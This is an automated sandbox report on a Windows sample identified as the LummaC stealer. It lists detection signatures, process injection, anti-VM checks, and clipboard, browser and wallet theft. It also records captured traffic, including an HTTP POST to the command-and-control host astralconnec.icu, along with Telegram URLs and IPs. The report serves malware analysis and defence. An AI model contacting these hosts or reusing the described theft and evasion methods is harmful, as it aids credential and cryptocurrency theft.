Edit tour

Windows Analysis Report
Superority.exe1.exe

Overview

General Information

Sample name:	Superority.exe1.exe
Analysis ID:	1633708
MD5:	56ec4fe0d12094a8750b70b3a0bf54be
SHA1:	f010c27c7ba7083d71a9c4451bec9588e22ed72a
SHA256:	99ee408c7116fc4d9416be5248874cf6397b6c65e42a035afcd4f8ad59705303
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Superority.exe1.exe (PID: 1648 cmdline: "C:\Users\user\Desktop\Superority.exe1.exe" MD5: 56EC4FE0D12094A8750B70B3A0BF54BE)

Superority.exe1.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\Superority.exe1.exe" MD5: 56EC4FE0D12094A8750B70B3A0BF54BE)

WerFault.exe (PID: 644 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 820 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.2375512214.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1229681983.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Superority.exe1.exe PID: 5988	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.Superority.exe1.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.Superority.exe1.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T15:31:07.705334+0100	2028371	3	Unknown Traffic	192.168.2.7	49686	149.154.167.99	443	TCP
2025-03-10T15:31:10.298423+0100	2028371	3	Unknown Traffic	192.168.2.7	49688	104.21.77.86	443	TCP
2025-03-10T15:31:14.197756+0100	2028371	3	Unknown Traffic	192.168.2.7	49690	104.21.77.86	443	TCP
2025-03-10T15:31:37.362043+0100	2028371	3	Unknown Traffic	192.168.2.7	49696	104.21.77.86	443	TCP
2025-03-10T15:31:40.516358+0100	2028371	3	Unknown Traffic	192.168.2.7	49697	104.21.77.86	443	TCP
2025-03-10T15:31:44.094027+0100	2028371	3	Unknown Traffic	192.168.2.7	49699	104.21.77.86	443	TCP
2025-03-10T15:31:47.557755+0100	2028371	3	Unknown Traffic	192.168.2.7	49700	104.21.77.86	443	TCP
2025-03-10T15:32:11.432611+0100	2028371	3	Unknown Traffic	192.168.2.7	49701	104.21.77.86	443	TCP

HTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: astralconnec.icu

Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: Superority.exe1.exe, 00000001.00000002.2376638644.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://astralconnec.icu/
Source: Superority.exe1.exe, 00000001.00000002.2376638644.00000000014A1000.00000004.00000020.00020000.00000000.sdmp, Superority.exe1.exe, 00000001.00000002.2376957171.00000000014E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://astralconnec.icu/DPowko
Source: Superority.exe1.exe, 00000001.00000002.2376638644.00000000014A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://astralconnec.icu/DPowko4
Source: Superority.exe1.exe, 00000001.00000002.2376204564.000000000143D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://astralconnec.icu/DPowkoT
Source: Superority.exe1.exe, 00000001.00000002.2376638644.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://astralconnec.icu/DPowkor
Source: Superority.exe1.exe, 00000001.00000002.2376638644.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://astralconnec.icu/O
Source: Superority.exe1.exe, 00000001.00000002.2376638644.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://astralconnec.icu/w
Source: Superority.exe1.exe, 00000001.00000002.2376204564.0000000001422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://astralconnec.icu:443/DPowko
Source: Superority.exe1.exe, 00000001.00000002.2375772181.0000000000F9A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asd
Source: Superority.exe1.exe, 00000001.00000002.2376204564.00000000013F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asdawfq

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.7:49688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.7:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.7:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.7:49701 version: TLS 1.2

Source: C:\Users\user\Desktop\Superority.exe1.exe

Code function: 1_2_00440D60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

1_2_00440D60

Source: C:\Users\user\Desktop\Superority.exe1.exe

Code function: 1_2_01351000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

1_2_01351000

Source: C:\Users\user\Desktop\Superority.exe1.exe

Code function: 1_2_00440D60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

1_2_00440D60

Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 0_2_0111253B	0_2_0111253B
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004171E0	1_2_004171E0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044F1F0	1_2_0044F1F0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00431340	1_2_00431340
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004463E0	1_2_004463E0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044A670	1_2_0044A670
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00446730	1_2_00446730
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004157CD	1_2_004157CD
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041B889	1_2_0041B889
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040B8B0	1_2_0040B8B0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041A8B0	1_2_0041A8B0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041292E	1_2_0041292E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00439A83	1_2_00439A83
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040EABE	1_2_0040EABE
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00421C80	1_2_00421C80
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042DD7A	1_2_0042DD7A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044CF50	1_2_0044CF50
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00401040	1_2_00401040
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044E06D	1_2_0044E06D
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040E017	1_2_0040E017
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00434032	1_2_00434032
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00426030	1_2_00426030
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00411151	1_2_00411151
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00448150	1_2_00448150
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004331D4	1_2_004331D4
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004301A3	1_2_004301A3
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004291B0	1_2_004291B0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043E1B0	1_2_0043E1B0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041D25D	1_2_0041D25D
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00426260	1_2_00426260
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043B265	1_2_0043B265
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040F27E	1_2_0040F27E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040A200	1_2_0040A200
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043235C	1_2_0043235C
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042137A	1_2_0042137A
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042D379	1_2_0042D379
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00428311	1_2_00428311
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00447390	1_2_00447390
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043C3A4	1_2_0043C3A4
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043D411	1_2_0043D411
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00409420	1_2_00409420
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044442D	1_2_0044442D
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004034F0	1_2_004034F0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004334F2	1_2_004334F2
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042E480	1_2_0042E480
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041648E	1_2_0041648E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040D4A0	1_2_0040D4A0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00430550	1_2_00430550
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00434560	1_2_00434560
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044E500	1_2_0044E500
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042A5C0	1_2_0042A5C0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004405D0	1_2_004405D0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044E5E0	1_2_0044E5E0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00425580	1_2_00425580
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00448641	1_2_00448641
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044F670	1_2_0044F670
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040C620	1_2_0040C620
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00414637	1_2_00414637
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041C6B9	1_2_0041C6B9
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00404772	1_2_00404772
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044E700	1_2_0044E700
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041F721	1_2_0041F721
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004317C0	1_2_004317C0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044E790	1_2_0044E790
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00421795	1_2_00421795
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042E7A0	1_2_0042E7A0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00433857	1_2_00433857
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044E820	1_2_0044E820
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004138D1	1_2_004138D1
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004318D2	1_2_004318D2
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004478D0	1_2_004478D0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004258B0	1_2_004258B0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00428950	1_2_00428950
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041E960	1_2_0041E960
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043C966	1_2_0043C966
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00430970	1_2_00430970
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041B912	1_2_0041B912
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_004329D5	1_2_004329D5
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044F9E0	1_2_0044F9E0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042EA52	1_2_0042EA52
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044DA0C	1_2_0044DA0C
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00408A20	1_2_00408A20
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044EAD0	1_2_0044EAD0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00440AD0	1_2_00440AD0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00402AF0	1_2_00402AF0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042DB70	1_2_0042DB70
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042FB11	1_2_0042FB11
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00445B10	1_2_00445B10
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00438BD0	1_2_00438BD0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043DBDD	1_2_0043DBDD
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044ABF0	1_2_0044ABF0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0042AC40	1_2_0042AC40
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040AC00	1_2_0040AC00
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00416CC5	1_2_00416CC5
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041CCE6	1_2_0041CCE6
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00443C89	1_2_00443C89
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00438C9E	1_2_00438C9E
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00444CA0	1_2_00444CA0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0040CD70	1_2_0040CD70
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00407D10	1_2_00407D10
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041BD1D	1_2_0041BD1D
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00438D22	1_2_00438D22
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00439E46	1_2_00439E46
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0041DE50	1_2_0041DE50
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043EE51	1_2_0043EE51
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00433E50	1_2_00433E50
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044EE30	1_2_0044EE30
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00411EE6	1_2_00411EE6
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00403E90	1_2_00403E90
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00408E90	1_2_00408E90
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043CF36	1_2_0043CF36
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0043FFD2	1_2_0043FFD2
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044AFF0	1_2_0044AFF0
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_00420F80	1_2_00420F80
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: 1_2_0044BF8B	1_2_0044BF8B

Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: String function: 0041A8A0 appears 100 times
Source: C:\Users\user\Desktop\Superority.exe1.exe	Code function: String function: 0040B200 appears 50 times

Source: C:\Users\user\Desktop\Superority.exe1.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 820

Source: Superority.exe1.exe, 00000000.00000000.1126774792.0000000000726000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePortals.exe0 vs Superority.exe1.exe
Source: Superority.exe1.exe, 00000000.00000002.1226797627.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Superority.exe1.exe
Source: Superority.exe1.exe	Binary or memory string: OriginalFilenamePortals.exe0 vs Superority.exe1.exe

Source: Superority.exe1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Superority.exe1.exe

Static PE information: Section: .CSS ZLIB complexity 1.0003268715421854

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/6@2/2

Source: C:\Users\user\Desktop\Superority.exe1.exe

Code function: 1_2_00446730 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_00446730

Source: C:\Users\user\Desktop\Superority.exe1.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1648

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2cbc0154-9441-4ac5-bbfc-7721c7a09ec9

Jump to behavior

Source: Superority.exe1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Superority.exe1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Superority.exe1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Superority.exe1.exe	Virustotal: Detection: 55%
Source: Superority.exe1.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\Superority.exe1.exe

File read: C:\Users\user\Desktop\Superority.exe1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Superority.exe1.exe "C:\Users\user\Desktop\Superority.exe1.exe"
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process created: C:\Users\user\Desktop\Superority.exe1.exe "C:\Users\user\Desktop\Superority.exe1.exe"
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 820
Source: C:\Users\user\Desktop\Superority.exe1.exe	Process created: C:\Users\user\Desktop\Superority.exe1.exe "C:\Users\user\Desktop\Superority.exe1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Superority.exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Superority.exe1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Superority.exe1.exe

Static file information: File size 37082112 > 1048576

Source: Superority.exe1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Superority.exe1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: Superority.exe1.exe
Source:	Binary string: System.Windows.Forms.pdb source: WERB259.tmp.dmp.4.dr
Source:	Binary string: Portals.pdb source: WERB259.tmp.dmp.4.dr
Source:	Binary string: mscorlib.pdb source: WERB259.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdbRSDS source: WERB259.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdb source: WERB259.tmp.dmp.4.dr
Source:	Binary string: System.pdb) source: WERB259.tmp.dmp.4.dr
Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: Superority.exe1.exe
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERB259.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdb source: WERB259.tmp.dmp.4.dr
